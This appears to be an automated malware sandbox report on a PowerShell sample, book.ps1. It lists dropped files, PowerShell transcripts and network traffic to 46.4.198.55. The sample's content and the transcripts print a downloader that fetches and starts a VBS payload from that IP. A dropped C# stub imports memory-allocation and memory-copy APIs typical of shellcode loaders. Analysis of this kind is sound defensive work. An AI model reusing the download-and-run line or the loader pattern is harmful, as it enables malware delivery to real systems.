                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.098629909666731
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryMdo5ak7YnqqfdoOPN5Dlq5J:+RI+ycuZhNmdo5akSfdoOPNnqX
                  MD5:EB5C43059DA31ED5EC6339319EA48835
                  SHA1:F2759B61893FFD40EAFA4863CD0EDB8E5533EAFA
                  SHA-256:36DB6AD58A67ABA40B090C2078CB6642E8CEB5D7CAD3194C4D2DB8EE92026D78
                  SHA-512:AE9528866B8F3276A81C1C26A1138E6AA14B6D32FBA7D4B7BDE46C9F862595ABDB7AC4E2CF3C574628E34330923F131ED83E2CC52CC0D0FDA3C816C7C04E96EB
                  Malicious:false
                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.t.g.0.3.2.l.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.t.g.0.3.2.l.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):487
                  Entropy (8bit):5.236532790609796
                  Encrypted:false
                  SSDEEP:12:V/DGr0nHWP7xReX6Sq76zSPRHC9ftAnHCARHpWfOQAKaD:JowWPFRI6SZzSlC9ftErpWhAV
                  MD5:56B3B782DBCC5028A8050646F2177FB1
                  SHA1:8B819399A5BC15644D6B81D5438A7B78E34662FC
                  SHA-256:A4DC022E81A07FEDD233869623B65353C72084C6C7971DA2F4A222F2C2223A3A
                  SHA-512:93F796C7CA68AAA78D3EA1C35E97C1C1FC5CE13ED528856DF53BF84FD254E6D2165D0A1122F321008C1DE4EEB00B4B3AFFDB23E5A95709F42305413011BB1A8B
                  Malicious:false
                  Preview:.using System;..using System.Runtime.InteropServices;..public static class Hexastich1..{..[DllImport("KERNEL32")]public static extern void RtlMoveMemory(IntPtr Bagfuls51,ref Int32 Bagfuls52,int Bagfuls53);..[DllImport("ntdll.dll", EntryPoint="NtAllocateVirtualMemory")]public static extern int VA(int Hexastich6,ref Int32 Semire,int Bagfuls5,ref Int32 Hexastich,int Print8,int Hexastich7);..[DllImport("USER32")]public static extern IntPtr EnumWindows(uint Bagfuls55,int Bagfuls56);..}
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.254565368001567
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fGn5KD+zxs7+AEszIwkn23fGn5KEA:p37Lvkmb6KRfunED+WZEifunEEA
                  MD5:C6D26A2F306341082CF3D4E7FE29F1DB
                  SHA1:80B6461E5F02D3AF63A84876CAE261BF417449F7
                  SHA-256:37DB437489762A0FFBA8E3460F514DA4CA87533F3D7ACBF3997D09B96466D5CB
                  SHA-512:AECFBCF1B206F50F18589DD09E13E28AD6FF36C8FFCB1DFE60F845D8CBA4609947E292542BC4F9D802C151C82B67CBB375B1BFFBBCF758F24BB9C0CE2DD6DD8F
                  Malicious:false
                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.0.cs"
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.800737969834327
                  Encrypted:false
                  SSDEEP:48:6vblYoGZQu4xKsf9BFZwUvT1ulSaa3FBq:GlYoGuu4xJ1cNK
                  MD5:DD7A380DE44D9286DD26DD2996C0119C
                  SHA1:779B8187C01D83714ABFA4CFA6C3BC159EF525FF
                  SHA-256:A488A4BAA44C85FA03F307108179B0A0A6E4BB2C208944650E487F14F5CB57CF
                  SHA-512:1456C98428191BDBE6D478C58F32EFE62B44F5B686A3432CE5B834ACE66B74DF29D80EEA11EEE034E5C01D92F875CF70F89D0E62C82C0C9FBF0B1C5327D59A88
                  Malicious:false
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....zb...........!................n$... ...@....... ....................................@..................................$..S....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P$......H.......P ..............................................................BSJB............v4.0.30319......l...X...#~..........#Strings....T.......#US.\.......#GUID...l...\...#Blob...........G.........%3............................................................2.+...............K.,.................................... 9............ G............ J.........V.....`.....j.....t...............................................$.....).!...-.....2.....;.^.g.......9.......q.......J.....
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):867
                  Entropy (8bit):5.327239025067284
                  Encrypted:false
                  SSDEEP:24:KJBqd3ka6KRfWED/EifWEE1KaM5DqBVKVrdFAMBJTH:Cika6CPEuiKxDcVKdBJj
                  MD5:6E9FACBC3733F6688707044FD9EB4413
                  SHA1:5116961171A3A26EEF1904F64FA3C673E5652EC9
                  SHA-256:2E5429B9AF5EBBB0C796C185B4CCCA5485814C2DA15FFAF85973914F62E5888D
                  SHA-512:9A91BAC986C3C713E80B4E168880C5E21293D02111041806A97718858464EC492000B797B485F4B35FB5C0DDD092757CD938F2B2BB53F811DDA228C128558824
                  Malicious:false
                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6205
                  Entropy (8bit):3.7489766835293885
                  Encrypted:false
                  SSDEEP:48:k437m9LiF10CYUHl8qjeukvhkvklCywPs1ozQ8/nSogZofM1ozQ8/nSogZozH:kIm9mF10CReqDkvhkvCCtUuQBH3uQBH2
                  MD5:BBE10FD90F7662CE71B0F0E2EB9640AE
                  SHA1:D3F05A11EE8D45F9F239E3F45DCA2CDD373D7DAE
                  SHA-256:F2E0E8100642DA826976A9A787AEB399D6534E8A8292910403CE43250E45B41B
                  SHA-512:E793E1AC424D261DE162930BECFB77AF7DBEEBD209DBCB4B4BC7B724136518586835B8DE2BCDDF51878351680ED9AC1FB885E150CD7F1F687E496A9E9E0E8943
                  Malicious:false
                  Preview:...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-....P..2..w..8.d......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...T.......Y....................yN|.A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...T.......Y.....................K..R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D.......N...T.......Y.....................sJ.M.i.c.r.o.s.o.f.t.....V.1.....hTjM..Windows.@.......N...T.......Y....................d...W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N...T.......Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N...T.......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N..hTKM.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6205
                  Entropy (8bit):3.7489766835293885
                  Encrypted:false
                  SSDEEP:48:k437m9LiF10CYUHl8qjeukvhkvklCywPs1ozQ8/nSogZofM1ozQ8/nSogZozH:kIm9mF10CReqDkvhkvCCtUuQBH3uQBH2
                  MD5:BBE10FD90F7662CE71B0F0E2EB9640AE
                  SHA1:D3F05A11EE8D45F9F239E3F45DCA2CDD373D7DAE
                  SHA-256:F2E0E8100642DA826976A9A787AEB399D6534E8A8292910403CE43250E45B41B
                  SHA-512:E793E1AC424D261DE162930BECFB77AF7DBEEBD209DBCB4B4BC7B724136518586835B8DE2BCDDF51878351680ED9AC1FB885E150CD7F1F687E496A9E9E0E8943
                  Malicious:false
                  Preview:...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-....P..2..w..8.d......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...T.......Y....................yN|.A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...T.......Y.....................K..R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D.......N...T.......Y.....................sJ.M.i.c.r.o.s.o.f.t.....V.1.....hTjM..Windows.@.......N...T.......Y....................d...W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N...T.......Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N...T.......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N..hTKM.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ISO-8859 text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):236358
                  Entropy (8bit):4.512575626068564
                  Encrypted:false
                  SSDEEP:3072:GlDrUO7/A9bLSzUFA7UqMAZ5uNIIhOD2Xq6s2mFgM:EHo9i434Z5uCIhLXC2pM
                  MD5:A382F9565D886D24DD48272EA634D7F4
                  SHA1:EC69AE77CB27ED66A7E30A60CFE08066A02331AD
                  SHA-256:A46BAD45E29490A9CCA35D894E5D0CA5FB3D78E4A6084B2E403307C73B3845DF
                  SHA-512:6BC1D779A8EAED0496C593E785FA366EC1E82269A95431E08B606E1C699AF21DB1038CAABF74C946D2EF61A5C82A6C5FE787AE1D92E0DD0D62E3228AB2E6B520
                  Malicious:false
                  Preview:'elaeocar Fredni8 kildeteks SEKSEREN trknings Blomsterga Drummers5 Ramhe Tvungen Vermicleno RYGSTDINDI Kontere Abortede KRET agtetsed Midtve8 Suprac Incrus Balneaeu6 Systemrela4 NATIONER denegat Interplay Intergen dandyisms FERR ..'TVILLIN Overm7 Kvarkssubs6 UNDERFR nielle Tabacinge5 Timevistsa4 APSI Chrisro8 lappishcdg unmatchab frstefdsel BEVGELSE relicary Predenia7 Ansgning stiksa Solf BLOKFUNKTI Katarakt3 siderefe ..'sch.uble Syges6 dibbuksil Bloms HORSE teleopp Ombuddets Centr5 Boulevardt Bipinnat8 AFBLS reinduce overelab Kogeg5 cantionarb Immundic3 abbed MONETIZ branc Semimedic WAGINGR ..'Pantheism1 Efterb8 Critic Tallseun3 Inflows2 disse Tegneblok3 Goodhear Raaolierne ..'Egetforb torsk kruma Soningersw3 Theo4 FREMRYKNIN Inferreri unpred INDESNEEN equival OVERDELIC indf videokamer Energimn1 Dogf Kaste ..'Quiltskra Quabirdop Udraa7 svarbreve Hicksit ochersepis Unlabial Cliq Vendinge1 Oversigsta5 BONFIL Sumpf1 Ufor4 Gravemaski Hyperperfe1 catego Discipl2 FALS Twinjetcal2 ELORGLERSA
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1053
                  Entropy (8bit):5.161870865373194
                  Encrypted:false
                  SSDEEP:24:BxSA07vBZ/x2DOXUWFUZ5tWBHjeTKKjX4CIym1ZJXoUZ5yWnxSAZ1S:BZyvj/oOlyeBqDYB1Z+y5ZZM
                  MD5:7F2A93EB2B61A67CC7CC03A6BB71FE42
                  SHA1:F74065C94AD1CF50DD3980DC0879CE4D20491791
                  SHA-256:EAC8007092FBC3524AA281BDBF9E6142E1A7E20194378A0231CE863A29F3BD72
                  SHA-512:62B2F00BA602AEE169FFC83E9D0F759384A561D1DC53AFD6CD7BBC7FFE299042080AB191E48A04326A6ECC3C0041359AA151160D4B76D76D64213F6751C445F5
                  Malicious:false
                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220510184438..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226546 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs..Process ID: 6344..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220510184438..**********************..PS>Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs..**********************..Command start time: 20220510184703..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript en
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1021
                  Entropy (8bit):5.113387706445619
                  Encrypted:false
                  SSDEEP:24:BxSARy7vBZ/x2DOXUW6Y+PWcHjeTKKjX4CIym1ZJXYPnxSAZ+:BZ2vj/oORZcqDYB1ZS/ZZ+
                  MD5:89247E981DBC22B1D59AF404180B0D68
                  SHA1:C5799BA3D83B298F9911602B634B3F04ADA528C9
                  SHA-256:CE32257188627522CDDDDA21D621BCAD843A51656BFD19B5A8F0D0F6B227E354
                  SHA-512:8BE91E842E67AEC93766B1DA3353E6DD56FC67D87D4D33601F8170890E4CDDD61637C7D3AF88F21201213ED789A4305730F0AFC4D16B6A36CBC9C6F53A8F8A65
                  Malicious:false
                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220510184434..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226546 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noLogo -ExecutionPolicy unrestricted -file C:\Users\user\Desktop\book.ps1..Process ID: 3144..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220510184434..**********************..PS>CommandInvocation(book.ps1): "book.ps1"....**********************..Command start time: 20220510184954..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220510184954..***
                  File type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Entropy (8bit):4.908253738543961
                  TrID:
                  • Text - UTF-8 encoded (3003/1) 100.00%
                  File name:book.ps1
                  File size:108
                  MD5:10c1a6b6135d5f641ed56cfde0da1967
                  SHA1:dbf7d6327c2bf13f3ae772f6eaaa1c0a5fc5473e
                  SHA256:75de1e1b097579bf1a18c494042b16192a969dfb0fb9cdb3759d362b7b4b6a5f
                  SHA512:340fd3f2c364c852582c17d01742bad113e599aa32e1102e5837023b34d1838acdefeca1646ba8579cafb887bcf6715a4a578dd24828a4dfbdfb5efc07f866c1
                  SSDEEP:3:QK/JJFsLTzTH3x85MHVf3tFdkQPVAWBxWjsWrK3HsWn:pYzLh8uvtnZPiGQj2Xn
                  TLSH:EFB01216DF172E0D060D4C60F074B9E1A6817772B46C51EAE1B93005754F5436247838
                  File Content Preview:...powershell Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs..start Sursdepa.vbs
                  Icon Hash:72f2d6fef6f6dae4
                  Timestamp  Source Port  Dest Port  Source IP  Dest IP
                  May 10, 2022 18:44:40.385945082 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.409142017 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.409244061 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.413928032 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.438344955 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.438370943 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.438388109 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.438405991 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.438491106 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.438560009 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.461571932 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.461605072 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.461627007 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.461647987 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.461663008 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.461669922 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.461694002 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.461694956 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.461715937 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.461739063 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.461755991 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.461783886 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.485105038 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485157013 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485196114 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485225916 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485255957 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.485277891 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485301018 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.485315084 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485352993 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485379934 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.485388041 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485425949 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485466003 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485476017 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.485502958 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485505104 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.485543013 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485579967 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485599041 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.485619068 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485656977 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485662937 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.485692978 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.485753059 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.508861065 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.508918047 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.508955002 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.508996010 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509036064 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509044886 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.509074926 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509076118 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.509116888 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509141922 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.509167910 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509208918 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509221077 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.509251118 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509293079 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509305000 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.509334087 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509376049 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509383917 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.509413958 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509459019 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.509460926 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509502888 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509541035 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509557962 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.509598017 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509639025 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509644985 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.509677887 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509716988 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509721041 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.509758949 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509798050 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509807110 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.509836912 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509876966 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509886026 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.509915113 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509954929 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.509958982 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.509994984 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.510036945 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.510042906 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.510078907 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.510118961 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.510121107 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.510159969 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.510200977 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.533369064 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533415079 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533440113 CEST  80  49728  46.4.198.55  192.168.2.4
